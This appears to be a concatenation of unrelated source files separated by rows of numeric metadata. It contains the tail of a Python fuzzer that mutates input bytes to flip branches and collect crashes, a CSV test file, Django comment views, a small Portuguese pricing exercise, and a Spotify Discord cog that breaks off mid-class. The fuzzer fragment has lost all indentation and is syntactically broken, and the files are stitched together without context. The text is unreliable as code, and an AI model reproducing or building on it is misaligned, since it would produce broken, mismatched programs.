distance = ops[0] - ops[1]
if (distance <= 0 and init_distance > 0) or (distance > 0 and init_distance <= 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_non_direct/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# magic constant case
else:
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if distance != init_distance:
loc_offset = int(offset.split('_')[0])
if loc_offset not in hot_offsets:
hot_offsets.append(loc_offset)
if (distance <= 0 and init_distance > 0) or (distance > 0 and init_distance <= 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_train/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, skip to next branch
if crack_bool:
continue
# no hot byte candidates, skip
if len(hot_offsets)==0:
continue
if init_distance > 0:
# construct an equal case to satisfy <= case
magic_ori = struct.pack("@Q", int(constant_magic))
else:
# construct an > case to safisfy > case
if constant_loc == 2:
magic_ori = struct.pack("@Q", int(constant_magic)+1)
elif constant_loc == 1:
if int(constant_magic) == 0:
continue
magic_ori = struct.pack("@Q", int(constant_magic)-1)
else:
print("error")
sys.exit(0)
# llvm operand size
magic_l = [magic_ori[:l] for l in [1,2,4,8]]
# write magic bytes to input and check branch coverage
for hot_offset in hot_offsets:
for magic in magic_l:
tmp_seed = init_seed.copy()
tmp_seed[hot_offset:hot_offset+len(magic)] = magic
with open("tmp_input",'wb') as f:
f.write(tmp_seed)
tmp_argvv[6] = argvv[6] + '_br'
out = ''
seed = './tmp_input'
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash " + str(k) + " br_tyte "+ str(br_type))
shutil.copyfile("tmp_input", "./crashes/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
for line in out.splitlines():
tokens = line.split(b':')
edge = int(tokens[0])
hit = int(tokens[1])
if edge == k:
if (init_distance <= 0 and hit == 2) or (init_distance > 0 and hit == 1):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("tmp_input", "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, early exit
if crack_bool:
break
if (hot_offset+1) >= len(magic):
tmp_seed = init_seed.copy()
tmp_seed[hot_offset-len(magic)+1 :hot_offset+1] = magic
with open("tmp_input",'wb') as f:
f.write(tmp_seed)
tmp_argvv[6] = argvv[6] + '_br'
out = ''
seed = './tmp_input'
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash " + str(k) + " br_tyte "+ str(br_type))
shutil.copyfile("tmp_input", "./crashes/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
for line in out.splitlines():
tokens = line.split(b':')
edge = int(tokens[0])
hit = int(tokens[1])
if edge == k:
if (init_distance <= 0 and hit == 2) or (init_distance > 0 and hit == 1):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("tmp_input", "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, early exit
if crack_bool:
break
# crack early exit
if crack_bool:
break
if br_type == 10 or br_type == 12:
seed_id = v[0]
if isinstance(v[0], tuple):
seed_id = v[0][0]
init_seed = bytearray(open(seeds[seed_id],'rb').read())
print("br id: " + str(k) + " br len: " + str(lenn) + " br type: " + str(br_type) + " magic: " + constant_magic + " magic_loc: " + str(constant_loc) + " file len: " + str(len(init_seed)))
# clean tmp dir
for f in glob.glob("./tmp_train/*"):
os.remove(f)
# create baseline file
with open("./tmp_train/"+str("121212"),'wb') as f:
f.write(init_seed)
# generate sample inputs
for i in range(len(init_seed)):
tmp_seed = init_seed.copy()
for val in possible_val:
tmp_seed[i] = val
with open("./tmp_train/"+str(i)+"_"+str(val),'wb') as f:
f.write(tmp_seed)
# parse variable values for each sample inputs
tmp_argvv[6] = argvv[6] + '_br_fast'
pro = subprocess.run(['./obtain_br','-i','tmp_train', '-o', './tmp_train', '-l', str(len(init_seed)), '-t', str(k)] + tmp_argvv[6:], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8", errors='ignore')
line = pro.stdout
lines = line[line.find('###$$$ obtain br')+18:].split('\n')[:-1]
tmp_dict = {}
# parse result
for line in lines:
tokens = line.split(':')
tokens2 = tokens[1].split(' ')
tmp_dict[tokens[0]] = [int(tokens2[0]), int(tokens2[1])]
if '121212' not in tmp_dict:
continue
init_op1 = tmp_dict['121212'][0]
init_op2 = tmp_dict['121212'][1]
init_distance = tmp_dict['121212'][0] - tmp_dict['121212'][1]
hot_offsets = []
min_dist = float('inf')
file_name = ''
# no magic constant case
if constant_loc == 0:
continue
# magic constant case
else:
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if distance != init_distance:
loc_offset = int(offset.split('_')[0])
if loc_offset not in hot_offsets:
hot_offsets.append(loc_offset)
if (distance == 0 and init_distance != 0) or (distance != 0 and init_distance == 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_train/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, skip to next branch
if crack_bool:
continue
# no hot byte candidates, skip
if len(hot_offsets)==0:
continue
# construct magic string
magic = []
for num in range(int(len(constant_magic)/2)):
magic.append(int('0x'+constant_magic[num*2:num*2+2],0))
magic_rev = magic.copy()
magic_rev.reverse()
for hot_offset in hot_offsets:
tmp_seed = init_seed.copy()
tmp_seed[hot_offset:hot_offset+len(magic)] = magic
if br_type == 10:
tmp_seed[hot_offset+len(magic)] = 0
with open("tmp_input",'wb') as f:
f.write(tmp_seed)
# run inputs and check results
tmp_argvv[6] = argvv[6] + '_br'
out = ''
seed = './tmp_input'
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash " + str(k) + " br_tyte "+ str(br_type))
shutil.copyfile("tmp_input", "./crashes/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
for line in out.splitlines():
tokens = line.split(b':')
edge = int(tokens[0])
hit = int(tokens[1])
if edge == k:
if (init_distance == 0 and hit == 2) or (init_distance != 0 and hit == 1):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("tmp_input", "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, early exit
if crack_bool:
break
if (hot_offset+1) >= len(magic_rev):
tmp_seed = init_seed.copy()
tmp_seed[hot_offset-len(magic_rev)+1 :hot_offset+1] = magic_rev
if br_type == 10:
if hot_offset >= len(magic_rev):
tmp_seed[hot_offset-len(magic_rev)] = 0
with open("tmp_input",'wb') as f:
f.write(tmp_seed)
tmp_argvv[6] = argvv[6] + '_br'
out = ''
seed = './tmp_input'
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash " + str(k) + " br_tyte "+ str(br_type))
shutil.copyfile("tmp_input", "./crashes/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
for line in out.splitlines():
tokens = line.split(b':')
edge = int(tokens[0])
hit = int(tokens[1])
if edge == k:
if (init_distance == 0 and hit == 2) or (init_distance != 0 and hit == 1):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("tmp_input", "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, early exit
if crack_bool:
break
crack_failed_but_I_tried = list(unexplored.keys())
pickle.dump(crack_failed_but_I_tried, open("crack_failed",'wb'))
with open("mut_cnt", 'w') as f:
f.write(str(mut_cnt))
def main():
argvv = sys.argv[1:]
tmp_argvv = argvv.copy()
while True:
# only save inputs that find new ec edges.
print("%%%%%%%%%%%%% run ec mode")
tmp_argvv[6] = argvv[6]+"_ec"
subprocess.run(['./mtfuzz']+tmp_argvv)
# save inputs that find new ec edges or ctx edges
print("%%%%%%%%%%%%% run ctx mode")
tmp_argvv[6] = argvv[6]+"_ctx"
subprocess.run(['./mtfuzz']+tmp_argvv)
# mutate hot bytes using intercepted operands
# print("%%%%%%%%%%%% crack hard branch")
# crack(tmp_argvv, argvv)
if __name__== "__main__":
main()
| 51.156849
| 240
| 0.433839
| 8,040
| 74,689
| 3.839055
| 0.041045
| 0.025465
| 0.02391
| 0.03188
| 0.90692
| 0.897071
| 0.892341
| 0.885473
| 0.882071
| 0.878669
| 0
| 0.030867
| 0.443492
| 74,689
| 1,459
| 241
| 51.191912
| 0.711729
| 0.06906
| 0
| 0.898778
| 0
| 0
| 0.090446
| 0
| 0
| 0
| 0
| 0.000685
| 0
| 1
| 0.002618
| false
| 0
| 0.009599
| 0
| 0.012216
| 0.050611
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3729123cf1f12692369b66319963b134b311c09c
| 5,845
|
py
|
Python
|
Tests/csv_test.py
|
Modusmundi/Paustachio
|
8d73d2d36a70cdf5308f020b3db62e408231390d
|
[
"Apache-2.0"
] | null | null | null |
Tests/csv_test.py
|
Modusmundi/Paustachio
|
8d73d2d36a70cdf5308f020b3db62e408231390d
|
[
"Apache-2.0"
] | null | null | null |
Tests/csv_test.py
|
Modusmundi/Paustachio
|
8d73d2d36a70cdf5308f020b3db62e408231390d
|
[
"Apache-2.0"
] | null | null | null |
import pytest
import csv
import csv_tools
import os
good_csv = 'good_csv.csv'
results = 'results.csv'
"""
We need to test that in the event of no supplied filename, a default file is generated.
"""
def test_default_csv_generation():
if os.path.exists(results):
print("Cleaned up results file from previous test.")
os.remove(results)
sample_results = [{'name': 'A Searched Named Example', 'group': 'Group 1', 'search': 'ou=people,o=example',
'filter': '(objectclass=*)', 'scope': 'sub', 'total': 2002,
'timestamp': 'Sun Oct 21 21:35:12 2018'},
{'name': 'A Search Named Example 2 - Electric Boogaloo', 'group': 'group 1',
'search': 'ou=people,o=example', 'filter': '(st=MI)', 'scope': 'sub', 'total': 51,
'timestamp': 'Sun Oct 21 21:35:12 2018'},
{'name': 'A Search Named Example 3 - The Search Strikes Back', 'group': 'group 2',
'search': 'ou=people,o=example', 'filter': '(&(l=Rockford)(st=NM))', 'scope': 'sub', 'total': 1,
'timestamp': 'Sun Oct 21 21:35:12 2018'}]
file_generated = csv_tools.csv_write.write(search_results=sample_results)
assert os.path.isfile(results) == 1
"""
We need to test that when a file is generated with multiple entries, that the entries come back appropriately.
"""
def test_rowcount_truthiness():
resultcounter = 0
if os.path.exists(results):
print("Rowcount truthiness - Cleaned up results file from previous test.")
os.remove(results)
sample_results = [{'name': 'A Searched Named Example', 'group': 'Group 1', 'search': 'ou=people,o=example',
'filter': '(objectclass=*)', 'scope': 'sub', 'total': 2002,
'timestamp': 'Sun Oct 21 21:35:12 2018'},
{'name': 'A Search Named Example 2 - Electric Boogaloo', 'group': 'group 1',
'search': 'ou=people,o=example', 'filter': '(st=MI)', 'scope': 'sub', 'total': 51,
'timestamp': 'Sun Oct 21 21:35:12 2018'},
{'name': 'A Search Named Example 3 - The Search Strikes Back', 'group': 'group 2',
'search': 'ou=people,o=example', 'filter': '(&(l=Rockford)(st=NM))', 'scope': 'sub', 'total': 1,
'timestamp': 'Sun Oct 21 21:35:12 2018'}]
file_generated = csv_tools.csv_write.write(search_results=sample_results)
with open(file=results, mode='r', newline='') as csvfile:
resultsreader = csv.reader(csvfile, dialect='excel', quotechar='"', doublequote=True,
quoting=csv.QUOTE_MINIMAL)
for row in resultsreader:
resultcounter += row.count('sub')
csvfile.close()
assert resultcounter == 3
"""
We need to test that in the event that a filename is supplied, that file is generated with an appropriate name.
"""
def test_bespoke_csv_generation():
if os.path.exists(good_csv):
print("Bespoke CSV generation - Cleaned up results file from previous test.")
os.remove(good_csv)
sample_results = [{'name': 'A Searched Named Example', 'group': 'Group 1', 'search': 'ou=people,o=example',
'filter': '(objectclass=*)', 'scope': 'sub', 'total': 2002,
'timestamp': 'Sun Oct 21 21:35:12 2018'},
{'name': 'A Search Named Example 2 - Electric Boogaloo', 'group': 'group 1',
'search': 'ou=people,o=example', 'filter': '(st=MI)', 'scope': 'sub', 'total': 51,
'timestamp': 'Sun Oct 21 21:35:12 2018'},
{'name': 'A Search Named Example 3 - The Search Strikes Back', 'group': 'group 2',
'search': 'ou=people,o=example', 'filter': '(&(l=Rockford)(st=NM))', 'scope': 'sub', 'total': 1,
'timestamp': 'Sun Oct 21 21:35:12 2018'}]
file_generated = csv_tools.csv_write.write(search_results=sample_results, save_file=good_csv)
assert os.path.isfile(good_csv) == 1
"""
We need to test that in the event of no CSV existing, appropriate headers are generated when the file is made.
"""
def test_good_header_testing():
rowcounter = 0
rowholder = {}
if os.path.exists(good_csv):
print("Good header testing - Cleaned up results file from previous test.")
os.remove(good_csv)
sample_results = [{'name': 'A Searched Named Example', 'group': 'Group 1', 'search': 'ou=people,o=example',
'filter': '(objectclass=*)', 'scope': 'sub', 'total': 2002,
'timestamp': 'Sun Oct 21 21:35:12 2018'},
{'name': 'A Search Named Example 2 - Electric Boogaloo', 'group': 'group 1',
'search': 'ou=people,o=example', 'filter': '(st=MI)', 'scope': 'sub', 'total': 51,
'timestamp': 'Sun Oct 21 21:35:12 2018'},
{'name': 'A Search Named Example 3 - The Search Strikes Back', 'group': 'group 2',
'search': 'ou=people,o=example', 'filter': '(&(l=Rockford)(st=NM))', 'scope': 'sub', 'total': 1,
'timestamp': 'Sun Oct 21 21:35:12 2018'}]
file_generated = csv_tools.csv_write.write(search_results=sample_results, save_file=good_csv)
with open(file=results, mode='r', newline='') as csvfile:
resultsreader = csv.reader(csvfile, dialect='excel', quotechar='"', doublequote=True,
quoting=csv.QUOTE_MINIMAL)
for row in resultsreader:
rowholder[rowcounter] = row
rowcounter += 1
csvfile.close()
assert rowholder[0] == ['Name', 'Group', 'Time of Search', 'Search DN', 'Filter Used', 'Search Scope', 'Record Count']
| 51.725664
| 122
| 0.570402
| 724
| 5,845
| 4.537293
| 0.165746
| 0.018265
| 0.051142
| 0.054795
| 0.785388
| 0.785388
| 0.756164
| 0.740335
| 0.73242
| 0.73242
| 0
| 0.046956
| 0.274936
| 5,845
| 112
| 123
| 52.1875
| 0.728174
| 0
| 0
| 0.707317
| 1
| 0
| 0.391474
| 0.016311
| 0
| 0
| 0
| 0
| 0.04878
| 1
| 0.04878
| false
| 0
| 0.04878
| 0
| 0.097561
| 0.04878
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2ef4a7a052a49c48acbb3433f0cff2cd222d2c79
| 3,398
|
py
|
Python
|
tree/views.py
|
oldevgeny/LegalTech-bot
|
91eb222afe9477a1cdcb9465152781bfacc11e23
|
[
"Apache-2.0"
] | null | null | null |
tree/views.py
|
oldevgeny/LegalTech-bot
|
91eb222afe9477a1cdcb9465152781bfacc11e23
|
[
"Apache-2.0"
] | null | null | null |
tree/views.py
|
oldevgeny/LegalTech-bot
|
91eb222afe9477a1cdcb9465152781bfacc11e23
|
[
"Apache-2.0"
] | null | null | null |
from django.shortcuts import render
from django.db import transaction
from django.http import HttpResponseRedirect
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.models import User
from .models import Post, Comment
from .forms import CommentForm
from .utils import create_comments_tree
def base_view(request):
comments = Post.objects.first().comments.all()
result = create_comments_tree(comments)
comment_form = CommentForm(request.POST or None)
return render(request, 'tree/base.html', {'comments': result, 'comment_form': comment_form})
def create_question(request):
comment_form = CommentForm(request.POST or None)
if comment_form.is_valid():
new_comment = comment_form.save(commit=False)
new_comment.user = request.user
new_comment.text = comment_form.cleaned_data['text']
new_comment.content_type = ContentType.objects.get(model='post')
new_comment.object_id = 5
new_comment.parent = None
new_comment.is_child = False
new_comment.is_answer = False
new_comment.save()
return HttpResponseRedirect('/add-data')
@transaction.atomic
def create_child_question(request):
user_name = request.POST.get('user')
current_id = request.POST.get('id')
text = request.POST.get('text')
user = User.objects.get(username=user_name)
content_type = ContentType.objects.get(model='post')
parent = Comment.objects.get(id=int(current_id))
is_child = False if not parent else True
comment_form = CommentForm(request.POST or None)
new_comment = comment_form.save(commit=False)
is_answer = False
Comment.objects.create(
user=user, text=text, content_type=content_type, object_id=1,
parent=parent, is_child=is_child, is_answer=is_answer
)
comments_ = Post.objects.first().comments.all()
comments_list = create_comments_tree(comments_)
return render(request, 'tree/base.html', {'comments': comments_list})
def create_answer(request):
comment_form = CommentForm(request.POST or None)
if comment_form.is_valid():
new_comment = comment_form.save(commit=False)
new_comment.user = request.user
new_comment.text = comment_form.cleaned_data['text']
new_comment.content_type = ContentType.objects.get(model='post')
new_comment.object_id = 5
new_comment.parent = None
new_comment.is_child = False
new_comment.is_answer = True
new_comment.save()
return HttpResponseRedirect('/add-data')
@transaction.atomic
def create_child_answer(request):
user_name = request.POST.get('user')
current_id = request.POST.get('id')
text = request.POST.get('text')
user = User.objects.get(username=user_name)
content_type = ContentType.objects.get(model='post')
parent = Comment.objects.get(id=int(current_id))
is_child = False if not parent else True
comment_form = CommentForm(request.POST or None)
new_comment = comment_form.save(commit=False)
is_answer = True
Comment.objects.create(
user=user, text=text, content_type=content_type, object_id=1,
parent=parent, is_child=is_child, is_answer=is_answer
)
comments_ = Post.objects.first().comments.all()
comments_list = create_comments_tree(comments_)
return render(request, 'tree/base.html', {'comments': comments_list})
| 40.452381
| 96
| 0.722778
| 452
| 3,398
| 5.216814
| 0.150442
| 0.084818
| 0.035623
| 0.061493
| 0.823155
| 0.823155
| 0.808312
| 0.775233
| 0.775233
| 0.775233
| 0
| 0.001423
| 0.172749
| 3,398
| 83
| 97
| 40.939759
| 0.837424
| 0
| 0
| 0.714286
| 0
| 0
| 0.041201
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064935
| false
| 0
| 0.103896
| 0
| 0.233766
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2c01ac454225c87b7269d1ee316960a50ad4ccc2
| 413
|
py
|
Python
|
Curso/ExMundo3/Ex108Modulos2Formatado.py
|
DavidBitner/Aprendizado-Python
|
e1dcf18f9473c697fc2302f34a2d3e025ca6c969
|
[
"MIT"
] | null | null | null |
Curso/ExMundo3/Ex108Modulos2Formatado.py
|
DavidBitner/Aprendizado-Python
|
e1dcf18f9473c697fc2302f34a2d3e025ca6c969
|
[
"MIT"
] | null | null | null |
Curso/ExMundo3/Ex108Modulos2Formatado.py
|
DavidBitner/Aprendizado-Python
|
e1dcf18f9473c697fc2302f34a2d3e025ca6c969
|
[
"MIT"
] | null | null | null |
from ExMundo3 import Ex108Modulo
p = float(input('Digite o preço: R$'))
print(f'A metade de {Ex108Modulo.moeda(p)} é {Ex108Modulo.moeda(Ex108Modulo.metade(p))}')
print(f'O dobro de {Ex108Modulo.moeda(p)} é {Ex108Modulo.moeda(Ex108Modulo.dobro(p))}')
print(f'Aumentando 15%, temos {Ex108Modulo.moeda(Ex108Modulo.aumentar(p, 15))}')
print(f'Diminuindo 20%, temos {Ex108Modulo.moeda(Ex108Modulo.diminuir(p, 20))}')
| 51.625
| 89
| 0.743341
| 61
| 413
| 5.032787
| 0.42623
| 0.312704
| 0.351792
| 0.123779
| 0.306189
| 0.306189
| 0.306189
| 0.306189
| 0
| 0
| 0
| 0.110526
| 0.079903
| 413
| 7
| 90
| 59
| 0.697368
| 0
| 0
| 0
| 0
| 0.333333
| 0.760291
| 0.510896
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.166667
| 0
| 0.166667
| 0.666667
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
25ec0d3b01e5c60f1755e3f745551e7ab85cd546
| 47,095
|
py
|
Python
|
spotify/menus.py
|
Thalamuszen/Trusty-cogs
|
83727ff6f625e8d8495313207844ea51a0026809
|
[
"MIT"
] | 1
|
2021-10-05T07:19:57.000Z
|
2021-10-05T07:19:57.000Z
|
spotify/menus.py
|
NeuroAssassin/Trusty-cogs
|
d4aef73d149a20c75a6809979c7ab4700b8d19a6
|
[
"MIT"
] | null | null | null |
spotify/menus.py
|
NeuroAssassin/Trusty-cogs
|
d4aef73d149a20c75a6809979c7ab4700b8d19a6
|
[
"MIT"
] | null | null | null |
from __future__ import annotations
import asyncio
import json
import logging
from copy import copy
from pathlib import Path
from typing import Any, List, Tuple
import discord
import tekore
from redbot.core import commands
from redbot.core.i18n import Translator
from redbot.core.utils.chat_formatting import box, humanize_list
from redbot.vendored.discord.ext import menus
from .helpers import (
REPEAT_STATES,
SPOTIFY_LOGO,
InvalidEmoji,
NotPlaying,
_draw_play,
make_details,
)
log = logging.getLogger("red.Trusty-cogs.spotify")
_ = Translator("Spotify", __file__)
class EmojiHandler:
def __init__(self):
with open(Path(__file__).parent / "emojis.json", "r") as infile:
self.emojis = json.loads(infile.read())
self.default = copy(self.emojis)
def get_emoji(self, name: str) -> str:
if name in self.emojis:
return self.emojis[name]
return self.default[name]
# we shouldn't have anyone deleting emoji keys
def reload_emojis(self):
# we could just copy default but we can also just
# reload the emojis from disk
with open(Path(__file__).parent / "emojis.json", "r") as infile:
self.emojis = json.loads(infile.read())
def replace_emoji(self, name: str, to: str):
if name not in self.emojis:
raise InvalidEmoji
self.emojis[name] = to
emoji_handler = EmojiHandler() # initialize here so when it's changed other objects use this one
class SpotifyTrackPages(menus.ListPageSource):
def __init__(self, items: List[tekore.model.FullTrack], detailed: bool):
super().__init__(items, per_page=1)
self.current_track = None
self.detailed = detailed
def is_paginating(self):
return True
async def format_page(
self, menu: menus.MenuPages, track: tekore.model.FullTrack
) -> discord.Embed:
self.current_track = track
em = discord.Embed(color=discord.Colour(0x1DB954))
url = f"https://open.spotify.com/track/{track.id}"
artist_title = f"{track.name} by " + ", ".join(a.name for a in track.artists)
em.set_author(
name=track.name[:256],
url=url,
icon_url=SPOTIFY_LOGO,
)
em.description = f"[{artist_title}]({url})\n"
if track.album.images:
em.set_thumbnail(url=track.album.images[0].url)
if self.detailed:
sp = tekore.Spotify(sender=menu.cog._sender)
with sp.token_as(menu.user_token):
details = await sp.track_audio_features(track.id)
msg = await make_details(track, details)
em.add_field(name="Details", value=box(msg[:1000], lang="css"))
em.set_footer(
text=_("Page") + f" {menu.current_page + 1}/{self.get_max_pages()}",
)
return em
class SpotifyArtistPages(menus.ListPageSource):
def __init__(self, items: List[tekore.model.FullArtist], detailed: bool):
super().__init__(items, per_page=1)
self.current_track = None
def is_paginating(self):
return True
async def format_page(
self, menu: menus.MenuPages, artist: tekore.model.FullArtist
) -> discord.Embed:
self.current_track = artist
em = discord.Embed(color=discord.Colour(0x1DB954))
url = f"https://open.spotify.com/artist/{artist.id}"
artist_title = f"{artist.name}"
em.set_author(
name=artist_title,
url=url,
icon_url=SPOTIFY_LOGO,
)
sp = tekore.Spotify(sender=menu.cog._sender)
with sp.token_as(menu.user_token):
cur = await sp.artist_top_tracks(artist.id, "from_token")
msg = _("Top Tracks\n")
for track in cur:
msg += f"[{track.name}](https://open.spotify.com/track/{track.id})\n"
em.description = msg
if artist.images:
em.set_thumbnail(url=artist.images[0].url)
em.set_footer(
text=_("Page") + f" {menu.current_page + 1}/{self.get_max_pages()}",
)
return em
class SpotifyAlbumPages(menus.ListPageSource):
def __init__(self, items: List[tekore.model.FullAlbum], detailed: bool):
super().__init__(items, per_page=1)
self.current_track = None
def is_paginating(self):
return True
async def format_page(
self, menu: menus.MenuPages, album: tekore.model.FullAlbum
) -> discord.Embed:
self.current_track = album
em = discord.Embed(color=discord.Colour(0x1DB954))
url = f"https://open.spotify.com/album/{album.id}"
title = f"{album.name} by {humanize_list([a.name for a in album.artists])}"
if len(title) > 256:
title = title[:253] + "..."
em.set_author(
name=title,
url=url,
icon_url=SPOTIFY_LOGO,
)
msg = "Tracks:\n"
sp = tekore.Spotify(sender=menu.cog._sender)
with sp.token_as(menu.user_token):
cur = await sp.album(album.id)
for track in cur.tracks.items:
msg += f"[{track.name}](https://open.spotify.com/track/{track.id})\n"
em.description = msg
if album.images:
em.set_thumbnail(url=album.images[0].url)
em.set_footer(
text=_("Page") + f" {menu.current_page + 1}/{self.get_max_pages()}",
)
return em
class SpotifyPlaylistPages(menus.ListPageSource):
def __init__(self, items: List[tekore.model.SimplePlaylist], detailed: bool):
super().__init__(items, per_page=1)
self.current_track = None
def is_paginating(self):
return True
async def format_page(
self, menu: menus.MenuPages, playlist: tekore.model.SimplePlaylist
) -> discord.Embed:
self.current_track = playlist
em = None
em = discord.Embed(color=discord.Colour(0x1DB954))
url = f"https://open.spotify.com/playlist/{playlist.id}"
artists = getattr(playlist, "artists", [])
artist = humanize_list([a.name for a in artists])[:256]
em.set_author(
name=artist or playlist.name,
url=url,
icon_url=SPOTIFY_LOGO,
)
user_spotify = tekore.Spotify(sender=menu.cog._sender)
description = ""
with user_spotify.token_as(menu.user_token):
cur = await user_spotify.playlist_items(playlist.id)
for track in cur.items[:10]:
description += (
f"[{track.track.name}](https://open.spotify.com/track/{track.track.id})\n"
)
em.description = description
if playlist.images:
em.set_thumbnail(url=playlist.images[0].url)
em.set_footer(
text=_("Page") + f" {menu.current_page + 1}/{self.get_max_pages()}",
)
return em
class SpotifyNewPages(menus.ListPageSource):
def __init__(self, items: List[tekore.model.SimplePlaylist]):
super().__init__(items, per_page=1)
self.current_track = None
def is_paginating(self):
return True
async def format_page(
self, menu: menus.MenuPages, playlist: tekore.model.SimplePlaylist
) -> discord.Embed:
self.current_track = playlist
em = None
em = discord.Embed(color=discord.Colour(0x1DB954))
url = f"https://open.spotify.com/playlist/{playlist.id}"
artists = getattr(playlist, "artists", [])
artist = humanize_list([a.name for a in artists])[:256]
em.set_author(
name=artist or playlist.name,
url=url,
icon_url=SPOTIFY_LOGO,
)
user_spotify = tekore.Spotify(sender=menu.cog._sender)
description = ""
with user_spotify.token_as(menu.user_token):
if playlist.type == "playlist":
cur = await user_spotify.playlist_items(playlist.id)
for track in cur.items[:10]:
description += f"[{track.track.name}](https://open.spotify.com/playlist/{track.track.id})\n"
if playlist.type == "album":
album = await user_spotify.album(playlist.id)
cur = album.tracks
for track in cur.items[:10]:
description += f"[{track.name}](https://open.spotify.com/album/{track.id})\n"
em.description = description
if playlist.images:
em.set_thumbnail(url=playlist.images[0].url)
em.set_footer(
text=_("Page") + f" {menu.current_page + 1}/{self.get_max_pages()}",
)
return em
class SpotifyEpisodePages(menus.ListPageSource):
def __init__(self, items: List[tekore.model.FullEpisode], detailed: bool):
super().__init__(items, per_page=1)
self.current_track = None
self.detailed = detailed
def is_paginating(self):
return True
async def format_page(
self, menu: menus.MenuPages, episode: tekore.model.FullEpisode
) -> discord.Embed:
self.current_track = episode
show = episode.show
em = discord.Embed(color=discord.Colour(0x1DB954))
url = f"https://open.spotify.com/episode/{episode.id}"
artist_title = f"{show.name} by {show.publisher}"
em.set_author(
name=artist_title[:256],
url=url,
icon_url=SPOTIFY_LOGO,
)
em.description = f"[{episode.description[:1900]}]({url})\n"
if episode.images:
em.set_thumbnail(url=episode.images[0].url)
em.set_footer(
text=_("Page") + f" {menu.current_page + 1}/{self.get_max_pages()}",
)
return em
class SpotifyShowPages(menus.ListPageSource):
